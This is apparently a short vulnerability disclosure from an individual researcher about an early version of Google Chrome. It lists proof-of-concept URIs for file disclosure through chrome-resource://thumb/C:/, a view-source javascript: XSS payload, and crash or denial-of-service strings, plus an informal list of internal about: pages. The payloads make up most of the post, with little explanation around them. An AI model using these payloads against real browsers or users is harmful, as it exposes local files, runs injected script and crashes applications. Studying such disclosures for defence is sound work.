#######################Google Chrome Inesecure Methods&XSS###########################################


#########By: e.wiZz!   ew1zz@hotmail.com   najjaci.net


#########Thanks: shinnai(for being so cool) and lot of other friends





In the wild...
######################################################################################################


Chrome suffers from insecure methods thru "view-source" URI scheme(it is just scheme,not protocol).

 file disclosure   chrome-resource://thumb/C:/


########  XSS:
Sometimes it won't work,dunno reason:

       view-source:javascript:alert('dssd');


########Further research:

sometimes browser crashes with:   
                                   view-source::::::::
                                   view-source://%00

also possible Dos(or loop) with:

                  chrome-resource://new-tab/new-tab/new-tab/new-tab/new-tab/new-tab/new-tab/new-tab/new-tab/new-tab/new-tab/



If you want to study protocols and other thingys,click "Start I/O" and surf a little:

                                  about:network


Other schemes:     
                     about:cache
                     about:dns
                     about:histograms
                     about:objects
                     about:memory
                     about:plugins
                     about:stats    <--- note to developer - you aren't funny tho.
                     about:version
                     about:crash  <--- make something what looks nice plz :)
                     chrome-resource:
                     view-cache:
                     about:internets  <--- they aren't working at Google Inc,they are bored i think :)